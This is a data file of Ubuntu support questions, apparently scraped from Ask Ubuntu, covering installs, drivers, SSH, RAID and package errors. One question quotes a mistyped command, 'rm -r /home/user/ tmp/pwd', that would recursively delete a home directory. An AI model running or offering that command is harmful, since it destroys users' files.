252998	how do i install unauthorized software ?	i am trying to install software from the ubuntu software center and keep getting the error saying that it is unauthorized software . i have all the check marks in place for downloading in system/software sources . what am i missing ?
253000	need to change default movie players in kubuntu 12.04	i 've recently installed kubuntu 12.04 on my computer , and the dragon movie player does n't work very well for me . so i installed the totem movie player ( which i 've used in both ubuntu and lubuntu with no issues ) but i need to get the computer to default to opening with the totem player . i tried changing it through `` settings '' and then `` device actions '' , but apparently i need to know the proper command to put in the setting . the command listed under the dragon player is : `` dragon -- play-dvd '' , so what do i need to enter to make it open with the totem player ? and , is that all that needs to be done ? thanks !
253019	ubuntu 12.10 desktop turns black when booting	i have hp laptop with windows 8.now i install ubuntu 12.10 in a different drive.fist time it opens.but next time when booting in ubuntu it turns black and not responding.in my laptop ubuntu 12.04 lts goes smooth , but 12.10 not.please help me .
253023	unable to set password for the mysql `` root '' user	i am new to ubuntu . i am running ubuntu 12.10 . i am trying to install apache , php , mysql . however i have installed apache and it is running perfectly . sudo apt-get install apache2 but when i tried to install mysql using following command sudo apt-get install mysql-server after download , it asked for password but after entering and confirming password . i get following error message . unable to set password for the mysql `` root '' user an error occurred while setting password for the mysql administrative user.this may have happened because the account already has a password , or because of a communication problem with the mysql server . you should check the account 's password after the package installation . please read the /usr/share/doc/mysql-server-5.5/readme.debian file for more information . after clicking on the ok button on the prompt i am getting following message on terminal setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.10.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) mysql error log says 130209 14:26:37 [ note ] plugin 'federated ' is disabled . 130209 14:26:37 innodb : the innodb memory heap is disabled 130209 14:26:37 innodb : mutexes and rw_locks use gcc atomic builtins 130209 14:26:37 innodb : compressed tables use zlib 1.2.7 130209 14:26:37 innodb : using linux native aio mysqld : ca n't create/write to file '/tmp/ibnuz7q0 ' ( errcode : 13 ) 130209 14:26:37 innodb : error : unable to create temporary file ; errno : 13 130209 14:26:37 [ error ] plugin 'innodb ' init function returned error . 130209 14:26:37 [ error ] plugin 'innodb ' registration as a storage engine failed . 130209 14:26:37 [ error ] unknown/unsupported storage engine : innodb 130209 14:26:37 [ error ] aborting i have searched for this problem , but nothing worked for me . please help .
253025	12.10 install on dell inspiron ati radeon 3xx fails to produce usable desktop	trying to install 12.10 i386 iso image from dvd to dell inspiron 9300 with ati radeon 3xx ( maybe 360 ? ) graphics card . the desktop is visible including the toolbar across the top of the desktop . however the launcher bar is not visible , which makes the install useless to me . in single user mode , i tried installing the fgrlx drivers and x 1.3 ( i think , its been a while ) , that rewarded me with no desktop at all . same situation if i install 12.04 i386 image from dvd . desktop worked perfectly the first time i installed 12.10 , with no special effort during install . but then my newbie goof while partitioning an sd card whacked the hd . since then , doing erase/install , have not been able to get a launcher with either ubuntu generation . am i just hosed because ati quit support for the radeon cards ? do i have any recourse with this old laptop ? i need it as a build platform for embedded ubuntu images for beaglebone . thanks , paul
253027	how to sandbox bash shell to affect only current directory ?	i heavily use bash to automate my work . hence i often [ re ] write long chunks of code right in the prompt . is there a way to make commands in any way affect only files from current directory ? so in case i 'll write something like rm -r /home/user/ tmp/pwd it wo n't get to all user 's files while i 'm in /home/user/tmp/pwd . afaiu chroot is not an option here .
253028	why does gwibber keep asking to authorize my facebook account , but does n't add the account after authorizing ?	i 'm using gwibber 3.4.2 on ubuntu 12.04 . i successfully authorized the account with gwibber , but gwibber does n't add my facebook account to the broadcasting account list . what 's up with gwibber ?
253031	missing operating system	i had windows 8 on my pc and i wanted to install ubuntu instead and after installing it and reboting a messege in the boot black screen says ( missing operating system ) that 's my first use for ubuntu ( any help ! ! ) please .
253033	unable to apply wallpapers	we are unable to apply wallpapers , we are getting the following error . how do i fix it ? ? error : error setting value : ca n't overwrite existing read-only value : value for `/desktop/gnome/background/picture_filename ' set in a read-only source at the front of your configuration path output : # cat /etc/gconf/gconf.xml.mandatory/ % gconf-tree.xml < ? xml version= '' 1.0 '' ? > < gconf > < dir name= '' desktop '' > < dir name= '' gnome '' > < dir name= '' background '' > < entry name= '' picture_filename '' mtime= '' 1360589143 '' type= '' string '' > < stringvalue > /usr/share/backgrounds/time.jpg < /stringvalue > < /entry > < /dir > < /dir > < /dir > note : need command line solution , coz i need to apply it for more than 300 hosts . i am using 10.04 lts . i am trying to apply wallpapers to all hosts remotely via ssh . i hope previously i have set the key to mandatory and so i am not able to set new wallpapers now . i need to apply new wallpapers now .
253035	copy paste not working in virtualbox from ubuntu [ host ] to ubuntu [ guest ]	how to copy & paste with virtualbox from ubuntu ( host ) to ubuntu ( guest ) ? i installed virtualbox guest edition on ubuntu [ guest ] system . but still its not working . if anyone can have some solution then please share it .
253036	shortening a frequently run command	i want to shorten sudo http_proxy= '' http : //proxy : port '' apt-get ______ to sudo rep apt-get ________ is this possible to implement in ubuntu ? edit : so i added alias rapt-get= '' http_proxy= '' 10.1.1.26:8080 '' apt-get '' to my ~/.bash_aliases . i have other working aliases in this file . if i type rapt-get in the terminal , i get : apt 0.8.16~exp12ubuntu10 for amd64 compiled on apr 20 2012 10:19:39 usage : apt-get [ options ] command apt-get [ options ] install|remove pkg1 [ pkg2 ... ] apt-get [ options ] source pkg1 [ pkg2 ... ] apt-get is a simple command line interface for downloading and installing packages . the most frequently used commands are update and install . commands : update - retrieve new lists of packages upgrade - perform an upgrade install - install new packages ( pkg is libc6 not libc6.deb ) remove - remove packages autoremove - remove automatically all unused packages purge - remove packages and config files source - download source archives build-dep - configure build-dependencies for source packages dist-upgrade - distribution upgrade , see apt-get ( 8 ) dselect-upgrade - follow dselect selections clean - erase downloaded archive files autoclean - erase old downloaded archive files check - verify that there are no broken dependencies changelog - download and display the changelog for the given package download - download the binary package into the current directory options : -h this help text . -q loggable output - no progress indicator -qq no output except for errors -d download only - do not install or unpack archives -s no-act . perform ordering simulation -y assume yes to all queries and do not prompt -f attempt to correct a system with broken dependencies in place -m attempt to continue if archives are unlocatable -u show a list of upgraded packages as well -b build the source package after fetching it -v show verbose version numbers -c= ? read this configuration file -o= ? set an arbitrary configuration option , eg -o dir : :cache=/tmp see the apt-get ( 8 ) , sources.list ( 5 ) and apt.conf ( 5 ) manual pages for more information and options . this apt has super cow powers . seems to be working . but if i type `sudo rapt-get update` , i get sudo : rapt-get : command not found ( sorry for the formatting issues , i 'm on through mobile and ca n't see the formatting bar )
253039	how can i uninstall my current java and install sun java 1.6	i installed jdk using the following command : sudo apt-get install default-jdk but it is the wrong version . i need java se 1.6 for building android . when i try building android , i get a message : checking build tools versions ... you are attempting to build with the incorrect version of java . your version is : java version `` 1.6.0_24 '' . the correct version is : java se 1.6 . please follow the machine setup instructions at https : //source.android.com/source/download.html how can i uninstall java version `` 1.6.0_24 '' and install java se 1.6 ? i have alien installed so i can install .rpm packages .
253041	is ubuntu server os 12.04.2 fully compatible and supported by bulldozer based amd opteron 3280 ?	questions 1 ) is ubuntu server os 12.04.2 fully compatible and supports with bulldozer based amd opteron 3280 ? 2 ) is it compulsory to use ubuntu server certified hardware vendors and models ? but my hardware vendor ( fujitsu primergy mx130 s2 server ) is not in ubuntu server certified hardware list , will this make any kernel panic errors or system instability during long run ?
253042	phone usb driver ?	lg has no support for a linux driver at this time for my phone . nor will they because its an older phone . ubuntu does n't recognize my phone it just charges it . i tried using bitpim to access my phone but no ports are available . i believe i need some kind of driver . i 've googled everywhere i ca n't seem to find anything . phone info- lg revere- non smart phone cdma what i would like to do : 1 . access entire file tree ( not sure if this is possible ) pretty much it not really into transferring ringtones or pictures to or from it . also i want to be able to see the spc because it is n't the default with 0's
253044	running ubuntu only from usb drive	is it possible to run ubuntu from the usb-drive only , without getting all changes wiped at restart ?
253048	safe to remove /usr/src/linux-headers after purging older linux images ?	i 'm running ubuntu 12.04 , and two active linux images 3.2.0-37 and 3.2.0-36 . in the /usr/src/ directory i find : linux-headers-3.2.0-23 linux-headers-3.2.0-23-generic linux-headers-3.2.0-26 linux-headers-3.2.0-26-generic linux-headers-3.2.0-29 linux-headers-3.2.0-29-generic linux-headers-3.2.0-31 linux-headers-3.2.0-31-generic linux-headers-3.2.0-32 linux-headers-3.2.0-32-generic linux-headers-3.2.0-33 linux-headers-3.2.0-33-generic linux-headers-3.2.0-34 linux-headers-3.2.0-34-generic linux-headers-3.2.0-35 linux-headers-3.2.0-35-generic linux-headers-3.2.0-36 linux-headers-3.2.0-36-generic linux-headers-3.2.0-37 linux-headers-3.2.0-37-generic today i sudo apt-get purge linux-image-x.x.x.x-generic *34 and *35 i have to add that /boot contains only *36 and *37 . is it safe to remove all of these except *37 and *36 ? thank you in advance .
253050	can i install ubuntu on an exfat hard drive ?	i would like to know if it 's possible to install ubuntu on an exfat hard drive , since windows 8 's drive admin utility only allow me to get ntfs and exfat partitions . thanks in advance .
253051	tata photon connected but no internet	tata photon+ is working correctly when connected to windows . i have previously connected and used it on ubuntu . but now i am not able to connect to the internet . i have followed the steps from this link carefully , and i get a message connection established . the only thing i remember is previously it got connected to cdma , and now i see evdo instead . has anyone come across this before ? any way to solve this ? i guess this might be something configurable .
253057	apt tries to connect to proxy server even without an apt.conf file	i 'm using my laptop sometimes behind a proxy and sometimes not . i 've created an /etc/apt/apt.conf file , i 've used it like that for the last 2 years : when behind a proxy i add the line : acquire : :http : :proxy `` http : //myproxy:8080/ '' ; when i do n't need proxy authentication , i remove or comment it out . it worked so well like that , but now whenever i try to run any apt-get command it tries to connect to the proxy server , even with these lines commented out , or with apt.conf does n't even exist .
253059	why does my hud often get cut off ?	i 've got a weird problem with hud , often it gets cut off like in the picture below : i 'm using ubuntu 12.04 on an asus zenbook ux31e . while this happens most of the times , sometimes it displays correctly but i have n't found out when or why . also i ca n't find anyone else having this problem so i 'm thinking it 's not a bug , but i might be wrong . it 's fairly annoying because i ca n't read the command , so any help would be appreciated .
253060	block unauthorized usb device . disable automount	i wrote a bash script that checks every second for new mounted usb devices . when a new device is mounted , my script gets its serial number and compares it with the serials i wrote in a text file , which represents my database of valid usb devices . if the new mounted serial matches with one of the serials in my db , it 's okay , but if it does n't , i get the message `` invalid device detected '' , and in the next second i unmount it with the command umount . the script runs every second , so even if the invalid device is mounted , in the next second is unmounted , you do n't get to perform any action on it . my question is how can i do the following : when an invalid device is detected , a new bash window should appear , asking for my root password . if i type the correct password and i login as root , i am being asked if i want to mount the invalid device detected or not . if i do , i mount it , and if i do n't , ... so , for the new window , i tried the xterm -e command , but i do n't really know what to do next . if you are interested in helping me , i can post my script , to show you what i 've done this far .
253061	how many users can be on my website ( home ubuntu-server ) at same time	i want to build my own ubuntu-server at home.and i need to know the max number of user that can visit my web site at same . if it depend from software of from hardware ( max ) ... my website is not google , but i need to know .
253064	why fonts are different on dolphin , skype and vlc ?	i am running lubuntu 12.04 and have installed dolphin , vlc and skype . i adjusted fonts for the menu of the programs to droid sans 8 , but dolphin , vlc and skype do not accept this setting and they look different . how can i set the font on these programs ?
253073	how and where can i monetise my application ?	i am currently publishing android apps on google play and the amazon appstore . are you going to provide a similiar place to market apps ? if so , is there some kind of digital rights management provided or any other solution preventing unauthorised use ? is the source code some how protected or is everything open source ?
253083	latest kernel update ( .38 ) does n't boot in 3d	i 'm using ubuntu 12.04 with nvdia ge-f card ( happily working and installed using these instructions ) . since the last kernel update ( 3.2.0-38-generic ) i can only boot in 2d mode ( otherwise it just freezes moments after i log in ) . is there a way to un-roll an update ? i need my machine ... .
253084	why ca n't i install php-mysql ?	in windows i use xampp . i have tried to install mysql from the command-line and i can access mysql through workbench software . now if i try to run wordpress on my computer , i get an error that `` your php installation appears to be missing the mysql extension which is required by wordpress . '' someone help me to install mysql extension ( s ) for my installation . if i try to install php-mysql : $ sudo apt-get install php-mysql then i get this error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package php-mysql please someone help me to install mysql extension . most of the blogposts i have seen have this trick , but it 's not working for me . the ubuntu software center shows me that both mysql server and client are both as installed .
253088	lubuntu software centre apps basket - no items displayed	i wish to install some programs in lubuntu ( 12.10 : i386 ) . in the software centre , if i select any app and click `` add to the apps basket '' , the apps basket tab shows `` apps basket ( 1 ) '' . but after visiting the tab `` apps basket ( 1 ) '' , there are no items displayed . everything is disabled . am i missing something ?
253093	is it possible to do a lossless conversion from m4v to webm ?	i have several m4v files , which i need to convert to webm . i am using ffmpeg for doing so and have used commands such as : ffmpeg -i myfiletoconvert.m4v output.webm the conversion works fine , and the resolution is still the same , however the quality is just not the same . what i actually would like is that the conversion is lossless . i would like the properties of the input file to be the same for the output file , so that i do not have a noticeable quality change . how would i accomplish that ?
253096	low level format of hard drive	can somebody please tell me how can i format a hard drive at a low enough level that the boot sector is re-written ? i guess the equivalent of fdisk /mbr .
253097	crashing issue . suspect nvidia drivers	after quite some kerfuffle i managed to get to activate the proprietary nvidia drivers . chose xorg : nvidia_current my attempts seemed successful but now unbuntu freezes after a minute or two and it wont enter failsafe graphical mode . the following is displayed when attempting it : xorg-server 2:1.11.4-0ubuntu10.11 ( for technical support please see www.ubuntu.com/support ) current version of pixman 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implimented , ( ? ? ) unknown . ( ++ ) log file : `` /var/log/xorg.failsafe.log '' , time sat feb 9 11:37:46 2013 ( ++ ) using config file : `` /etc/x11/xorg.conf.failsafe '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d vesa : ignoring devide with a bound kernel driver fatal server error : no screens found please consult the x.org foundation support at http : //wiki.x.org for help . please also check `` /var/log/xorg.failsafe.log '' for additional information ddxsiggiveuo : closing log server terminated with error ( 1 ) closing log file . now i 've had a look on the x.org website but ca n't see an explanation of the error , or how to fix it . with ubuntu crashing as quickly as it does i ca n't open the log files in time to see the contents and i 'm still not sufficiently conversant with the text based file system to find and open the logs and config files to open them to see what they say . do i need to uninstall the nvidia_drivers and then re-install a different set ? how can i do that ? if it helps the graphics chipset on my laptop is a nvidia 6100 go so hardly new hardware . or could it be the fiddling i 've been trying with broadcom drivers ? whatever it is i 've done i 've made ubuntu pretty much un-usable so would really love help on this one . what other information might you need to assist ?
253112	how to resolve dpkg error code 1 ?	i 'm having issues with installing these two updates : linux-generic-pae linux-image-generic-pae getting the following errors every time i try to upgrade : setting up linux-image-3.2.0-35-generic-pae ( 3.2.0-35.55 ) ... internal error : could not find image ( /boot/vmlinuz-3.2.0-35-generic-pae ) dpkg : error processing linux-image-3.2.0-35-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-35-generic-pae ; however : package linux-image-3.2.0-35-generic-pae is not configured yet . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.35.40 ) ; however : package linux-image-generic-pae is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-3.2.0-35-generic-pae linux-image-generic-pae linux-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help would be much appreciated !
253113	used ssh to establish internal connection to another virtual machine ; now i ca n't change it back	i logged onto my server from a remote computer via ssh using its hostname server.domain.com . the samba server 's ip is 192.168.5.33 . i then used the ssh command to connect with the local ftp server ( 192.168.5.37 ) : ssh 192.168.5.37 . got asked if i want to proceed as the fingerprint was not in the list of known hosts . confirmed , and it got permanently added to the list of known hosts . whenever i connect to server.domain.com now , i end up on 192.168.5.37 instead of 192.168.5.33 . if i use ssh 192.168.5.33 , i end up in a main directory containing the files initiatorname.iscsi iscsid.conf nodes instead of what i expected in the root directory . how do i get back to the root where i will find folders like /var/logs ?
253117	how do i fix an input/output error using dd ?	hi i 'm trying fixing my windows 7 system with a broken harddrive , but it 's still running . i 'm trying copy all data to a new drive to reinstall windows 7 . drive called sqservice . i ca n't copy at all - see below : $ sudo dd if=/dev/sdc1 of=/dev/sda1 dd : reading `/dev/sdc1 ' : input/output error 11233976+0 records in 11233976+0 records out 5751795712 bytes ( 5.8 gb ) copied , 187.731 s , 30.6 mb/s how to fix this `` input/output error '' ?
253120	ca n't do sudo commands with user without password . not sure if i understand this correctly	i 'm setting up this ubuntu dual boot . i have two users . one called smallcomputer that is supposed to be an administrator account and then i thought it might be handy to create a user account called bob . my plan is to use bob for everyday surfing and stuff and the adminstrator account for doing advanced stuff like changing system configuration and stuff . bob does n't have a password , but smallcomputer has . i would like the system to boot into bob directly when i start the computer , and not ask which account i should want to log in to . how do i do that ? i feel this should be able to be done since he does not have a password . i also have some problem with when i 'm logged in as bob and want to do a sudo command . sometimes i see tutorials from internet about changing something and they say `` write this in the terminal '' . i can never execute a sudo command logged in as bob . i tried typing my adminstrator password and typing no password at all ( just typing return ) and the terminal just says it 's the wrong password . those are the only account i know of that are installed on the system . if i 'm logged in as administrator i have no problem executing sudo commands . why ca n't i do it from the regular user account ? does calling sudo ( when logged in as bob ) try to log in as administrator account or is it some level beyond that like some root account ? it 's ubuntu 12.10 . thanks for any help
253122	problem setting up local ssh server	i am trying to setup one of my linux computers as an ssh server but i ca n't connect to it . i have openssh-server and openssh-client installed already on both computers ( client and server ) . if i run sudo service ssh start , i get start : job is already running : ssh , so ssh is indeed running . also , ps aux | grep -i ssh returns 1000 2270 0.0 0.0 4080 24 ? ss 06:04 0:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session mate-session 1000 2286 0.0 0.3 59104 7832 ? sl 06:04 0:00 /usr/bin/mate-keyring-daemon -- start -- components=ssh 1000 6333 0.0 0.0 6684 1132 ? ss 07:29 0:00 /usr/sbin/sshd root 12622 0.0 0.1 6684 2432 ? ss 08:09 0:00 /usr/sbin/sshd -d 1000 13978 0.0 0.0 4392 844 pts/0 s+ 08:33 0:00 grep -- color=auto -i ssh if i run ssh localhost on the server , i can connect . but if i try that with the other computer on the lan , it does n't work . i have samba shares setup and working , so i do n't think its a firewall problem . any help would be appreciated .
253126	security bug when switching user account	i face the following security issue on ubuntu 12.04 , classic desktop . there we have 6 user accounts on the machine . one user logs on . ok. then a second user is using the user switcher logs in as well . that is also fine . but the problem is , that if user2 tries to switch to user1 account , then no password is required . so all the logged in users just may switch to each others desktop . may it be related with the above problem , that the screen locking is not working at all , even selected from the taskbar menu or clicking alt-l . thank you ! balazs
253127	404 not found for greek language installation	i want to install greek language support for my ubuntu 12.10 . i go through system settings - > language support , check the greek but when the system tries to download the files i get a : failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox-locale-el_18.0.1+build1-0ubuntu0.12.10.1_amd64.deb 404 not found i tried to hit the url from my browser and i still get a 404 . my internet connection works fine . i 'm pretty new at ubuntu so can you please help me with that ? am i doing something wrong ?
253130	scaling desktop screen	i am using panasonic tv 42 inch as monitor via hdmi port and my desktop is stretching out scaled and some parts of desktop are not visible . i need help to scale down the horizontal and vertical scaling using ubuntu os settings as i cant do it using tv settings . kindly help me . thank you .
253131	trying to set thunar as a default file manager in ubuntu 12.04	is it possible to make thunar my default file manager in ubuntu 12.04 lts successfully instead of quite slow nautilus ? i 've installed thunar and i must say there 's really visible difference comparing to gnome-shell default manager . however when i marked off nautilus from startup applications my desktop icons disappeared . thanks for any help .
253132	gcc and g++ are installed but ubuntu says they are not installed	i have installed g++ and gcc from repository on ubuntu 12.04 ad you can see that they are indeed installed mahmood @ pc : ~ $ dpkg -l | grep gcc ii gcc-4.4 4.4.7-1ubuntu2 gnu c compiler ii gcc-4.4-base 4.4.7-1ubuntu2 gcc , the gnu compiler collection ( base package ) ii gcc-4.4-multilib 4.4.7-1ubuntu2 gnu c compiler ( multilib files ) ii gcc-4.6-base 4.6.3-1ubuntu5 gcc , the gnu compiler collection ( base package ) ii lib32gcc1 1:4.6.3-1ubuntu5 gcc support library ( 32 bit version ) ii libgcc1 1:4.6.3-1ubuntu5 gcc support library ii libgcc1-dbg 1:4.6.3-1ubuntu5 gcc support library ( debug symbols ) mahmood @ pc : ~ $ dpkg -l | grep g++ ii g++-4.4 4.4.7-1ubuntu2 gnu c++ compiler ii g++-4.4-multilib 4.4.7-1ubuntu2 gnu c++ compiler ( multilib files ) however when i run gcc or g++ commands , it says they are not installed mahmood @ pc : ~ $ g++ the program 'g++ ' can be found in the following packages : * g++ * pentium-builder try : sudo apt-get install < selected package > mahmood @ pc : ~ $ gcc the program 'gcc ' can be found in the following packages : * gcc * pentium-builder try : sudo apt-get install < selected package > what did i miss ? ?
253133	apple remote control setup on imac with ubuntu 12.10	in the process of setting up the remote control of my imac ( running ubuntu 12.10 ) , i am stuck . i followed the instructions that i found on https : //help.ubuntu.com/community/lirc and i am stuck after the irw part : as advised in the how-to , i run irw and i correctly see the signal the remote is sending ( play , pause , forward etc. ) . sofar everything perfect . then i got a .lircrc from the web containing this : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # save as ~/.lircrc # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # after modifying : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # sudo /etc/init.d/lirc restart # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # vlc # # # # # # # # # # # # # # # # # begin prog = vlc button = key_playpause config = key-play-pause repeat = 0 end begin prog = vlc button = key_menu config = key-stop repeat = 0 end begin prog = vlc button = key_rewind config = key-jump-short repeat = 1 end begin prog = vlc button = key_forward config = key-jump+short repeat = 1 end begin prog = vlc button = key_volumeup config = key-vol-up repeat = 1 end begin prog = vlc button = key_volumedown config = key-vol-down repeat = 1 end # # # # # # # # # # # # # # # # # # # # # mplayer # # # # # # # # # # # # # # # # # # # # # # begin mplayer begin prog = mplayer button = key_playpause config = pause repeat = 15 end begin prog = mplayer button = key_menu config = stop repeat = 15 end begin prog = mplayer button = key_rewind config = seek -10 repeat = 10 end begin prog = mplayer button = key_forward config = seek +10 repeat = 10 end begin prog = mplayer button = key_volumeup config = volume 1 repeat = 1 end begin prog = mplayer button = key_volumedown config = volume -1 repeat = 1 end # end mplayer # # # # # # # # # # # # # # # # # # # totem # # # # # # # # # # # # # # # # # # # begin prog = totem button = key_playpause config = play_pause end begin prog = totem button = key_menu config = fullscreen end begin prog = totem button = key_forward config = seek_forward end begin prog = totem button = key_rewind config = seek_backward end begin prog = totem button = key_volumeup config = volume_up repeat = 1 end begin prog = totem button = key_volumedown config = volume_down repeat = 1 end # # # # # # # # # # # # # # # # # # # # # # # audacious # # # # # # # # # # # # # # # # # # # # # # # begin prog = audacious button = key_playpause config = pause repeat = 16 end begin prog = audacious button = key_menu config = stop repeat = 0 end begin prog = audacious button = key_forward config = next repeat = 16 end begin prog = audacious button = key_rewind config = prev repeat = 16 end # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # turn up and down the volume ( working by default on feisty ) # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # begin prog = irexec button = key_volumeup config = amixer set pcm 9+ & # amixer set pcm 3 % + & repeat = 2 end begin prog = irexec button = key_volumedown config = amixer set pcm 9- & # amixer set pcm 3 % - & repeat = 2 end # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # evince y openoffice ( presentations ) # # # # # # # # start with line command : # # # # $ irxevent -d # # # # and kill with : # # # # $ killall irxevent # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # begin prog = irxevent button = key_playpause config = key f11 currentwindow config = key f5 currentwindow repeat = 0 end begin prog = irxevent button = key_menu config = key escape currentwindow repeat = 0 end begin prog = irxevent button = key_rewind config = key prior currentwindow repeat = 1 end begin prog = irxevent button = key_forward config = key next currentwindow repeat = 1 end begin prog = irxevent button = key_volumeup config = key ctrl-plus currentwindow repeat = 0 end begin prog = irxevent button = key_volumedown config = key ctrl-minus currentwindow repeat = 0 end which i chose because it was looking as it should according to the lirc page ( http : //www.lirc.org/html/configure.html # lircrc_format ) then i thought that this would be it so i ran irexec -d thinking that i could then be able to play/pause/forward my favorite videos on vlc with the remote control , but after firing vlc it was n't working . i rebooted , retried , tried also other times by running the deamon ( as root or not , trying actually every combination ) with : sudo /etc/init.d/lirc start but no success . i searched and could n't found something working . i may missed something . obviously i did something wrong ( or forgot to do something ) , therefore i would like to ask you guys your help/advice .
253134	problems booting 12.04.2 after update	i recently bought parts for a small mediacenter pc , and planned on running ubuntu with xbmc . i 'm having massive problems with installing ubuntu and thinking about switching to windows ( worst case ) . the computer consists of following : intel desktop board dn2800mt innovation series corsair mac memory - 204 pin - 4 gb hatachi harddrive - 320 gb at first i installed 12.10 , without any luck , the system was n't booting . after browsing the web , i installed the 12.04.1 lts . that worked . after running til first update ( to 12.04.2 ) the system wo n't boot properly ( but not the same way , as with 12.10 ) . it looks like this : can any of you guys help , so i do n't have to use windows .
253136	recommendation of device+software to listen to audible.com audiobook	i use ubuntu 12.10 and i am searching for some way to easily , and legally listen to audible.com audiobooks in an external device . i have an 2008 second generation ipod shuffle ( which i gained as a gift , before converting to linux ) and i am having a really bad time in trying to use it in my current system . i have already tried to use it through itunes installed in playonlinux , and in a virtual win7 in virtualbox ( what would be a complete overkill in ram usage and $ $ ) with no success . i have also tried installing gtkpod and following its instructions but it seemed to me that my system does not meet some conditions for it to work . the only thing i really want is some effective and inexpensive way to directly listen to the .aa files ( that are sold in audible.com ) in an external device . i really would not have any issues buying another device ( and would even prefer to , so get off apple ) , provided it could directly play those .aa ( or , more generally any drm ) files , or is a there an easy and legal way to convert them into mp3/mp4 files .
253141	wine problem with install	when i press install , i get this message package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . details : the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.7ubuntu6 is to be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu20.1 is to be installed depends : wine1.4-amd64 ( = 1.4.1-0ubuntu1 ) but 1.4.1-0ubuntu1 is to be installed depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) but it is not going to be installed my system : release 12.10 ( quantal ) 64-bit kernel linux 3.5.0-24-generic gnome 3.6.0 processor : intel® core™ i5 cpu 750 @ 2.67ghz × 4 memory:3.9 gib available disk space:868.0 gib
253142	evolution - setup screen too `` long '' for screen , hides ok button	when i set up preferences in evolution , the bottom part of the dialogue screen gets hidden so that i can not see a `` cancel '' or `` ok '' button down below . scrolling with the mouse does n't help . how do i fix this , please ?
253147	printer menu different between 2 ubuntu 12.10	i got two samsung new series 9 , 13 ' , the very same , with ubuntu 12.10 installed on it ( erratum : the second one seems to have 13.04 installed on it , but same kernel 3.5.0-23 ) . i installed the mp495 printer driver on both : $ dpkg -l | grep 495 rc scangearmp-mp495series 1.60-1 amd64 scangear mp for linux . but one can print , and the other one can not . indeed , i found something weird : and here is the printer menu on laptop n째2 , not working : what 's wrong with this n째2 ? never seen such printing menu before ... so i ca n't follow the usual procedure to add a new printer , and ca n't print from this n째2 laptop ( wifi printing ) . any help would be much appreciated .
253150	ubuntu 12.04 raid 5/6 : native raid or zfs ?	have 8 hard drives of different sizes that i want in a raid 5 or 6 configuration , the os is ubuntu 12.04 desktop . does the native raid in ubuntu support raid configurations with hard drives of different sizes ? can i grow the raid in the future ? if not , is zfs a good alternative to this ? i have looked at other alternatives like flexraid ( support is terrible and documentation is just as reliable ) , unraid , and snapraid but there seems to be limitations with each of them . but , zfs seems to be a good long term solution for raid management and growth .
253151	terminal command to clean tmp folder and set permission flags	because of a low-graphics error i am not able to log into my system anymore . well .. i am not seeing any graphical interface ( solutions here how to fix `` the system is running in low-graphics mode '' error ? have been tried ) . df -h revealed that my /dev/sda6 partition is full : filesystem size used avail use % mounted on /dev/sda6 7.4g 6.6g 398m 95 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 762m 424k 762m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 0 1.9g 0 % /run/shm overflow 1.0m 4.0k 1020k 1 % /tmp /dev/sda7 449g 266g 161g 63 % /home /dev/sda1 447m 115m 308m 28 % /boot and sudo du -kxa / | sort -nr | head leads to the output sort : write failed : /tmp/sortxxxxxx ( x = any number or letter ) : no space left on device . therefore my question , how do i clean this /tmp/sortxxxxxx folder or directory with terminal commands and how do i set permission flags for that folder or directory to the standard value ? i assume i messed up this permissions and now every process is writing to tmp . thank you !
253152	how to set up an nfs server on ubuntu ?	how do i make my ubuntu install an nfs server . so that it is accessible to another system running xbmc on my network ? output of exportfs -v : root @ amith-dualcore : # exportfs -v /media/amith/amith-deskt 192.168.1.0/24 ( rw , async , wdelay , insecure , root_squash , no_subtree_check , fsid=0 ) the client is running xbian on a raspberry pi , having xbmc 12.0-rc1 .
253153	why does window buttons appear twice in chrome/chromium ?	after following some beginners tips/tricks for ubuntu 12.10 , i noticed that chrome/chromium windows shows the minimize , maximize and close button twice . i tried undoing what i did , but that did n't fix the issue . why is it so ?
